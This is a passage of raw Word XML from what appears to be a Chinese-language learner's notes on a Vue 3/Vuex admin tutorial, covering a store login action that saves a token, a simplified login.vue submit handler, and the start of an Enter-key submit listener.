      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7DFF1" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        login({ commit }, { username, password }) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E470362" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559907A" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                login(username, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08089C46" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FD7F6" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        setToken(res.token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ECCA7C" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        resolve(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720FA3F" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572D1ED3" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    .catch(err =&gt; reject(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7904599E" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF01DA" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26E0FD" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109206C1" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前登录用户信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19E078" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        getinfo({ commit }) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C54AEF" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8AFE1" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                getinfo()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E02AB9" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D3C8D6" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        commit('SET_USERINFO', res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CC741C" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        resolve(res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F431D" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080EB3F0" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    .catch(err =&gt; reject)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719B02A" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F881B03" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53814789" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A23FF1" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687BCCFA" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70737726" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534FBDB8" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="0019217F" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352E0B7E" w14:textId="4B33CA28" w:rsidR="001329A4" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ogin.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r>
        <w:t>.login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427BBDD6" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="00181907" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202E8526" w14:textId="4BDED08E" w:rsidR="001329A4" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以取消</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一类的代码，并且删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6C471" w14:textId="39E92A88" w:rsidR="001329A4" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:t>// import { login } from '~/api/manager'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B0164" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269100BE" w14:textId="1E5CFFC8" w:rsidR="001329A4" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因为之前</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.vue</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认已经使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的代码了，所以此处不需要再引入</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>useStore from vuex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D64155" w14:textId="1CE7E44E" w:rsidR="001329A4" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import { useStore } from 'vuex'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D951837" w14:textId="516B291D" w:rsidR="001329A4" w:rsidRPr="00181907" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const store = useStore()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCEFAFB" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7F328C" w14:textId="79652E48" w:rsidR="001329A4" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nSubmit</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>动作目前直接简化为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC6379" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56111437" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const onSubmit = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6841541A" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    formRef.value.validate((valid) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D444648" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (valid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F491405" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            // console.log('submit!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2191D1D2" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            loading.value = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B1C22" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE3430D" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>store.dispatch("login", form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B904FEA" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                .then(res =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56D07F" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    toast("</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>", "success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F898828" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    router.push("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A392F35" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                }).finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED50BCC" w14:textId="77777777" w:rsidR="0019217F" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    loading.value = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C2E3A7" w14:textId="4E328194" w:rsidR="001329A4" w:rsidRPr="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019217F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F0D40" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C47C3" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            console.log('error submit!!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E39D2E4" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C4081" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D23803D" w14:textId="77777777" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C0B785" w14:textId="75FB62DF" w:rsidR="0019217F" w:rsidRDefault="0019217F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA43963" w14:textId="77777777" w:rsidR="001329A4" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3A5BE2" w14:textId="293D6EF5" w:rsidR="001329A4" w:rsidRDefault="002C27C7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加键盘监听</w:t>
      </w:r>
      <w:r w:rsidR="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，按下回车提交表单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25E290" w14:textId="77777777" w:rsidR="002C27C7" w:rsidRDefault="002C27C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B9EFD1" w14:textId="075F62EC" w:rsidR="00285A0F" w:rsidRPr="00285A0F" w:rsidRDefault="00285A0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>代码如下，很简单明了，但是不太清楚</w:t>
      </w:r>
      <w:r w:rsidRPr="00285A0F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>onMoun</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3119">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ted, onBeforeUnmount</w:t>
      </w:r>
      <w:r w:rsidRPr="007C3119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的两个状态意味着啥</w:t>
      </w:r>
      <w:r w:rsidR="007C3119" w:rsidRPr="007C3119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007C3119" w:rsidRPr="007C3119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>问了下</w:t>
      </w:r>
      <w:r w:rsidR="007C3119" w:rsidRPr="007C3119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gpt</w:t>
      </w:r>
      <w:r w:rsidR="007C3119" w:rsidRPr="007C3119">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>没回答个我直接能理解的内容，此处直接硬背就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3F3E6" w14:textId="77777777" w:rsidR="001329A4" w:rsidRPr="00181907" w:rsidRDefault="001329A4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
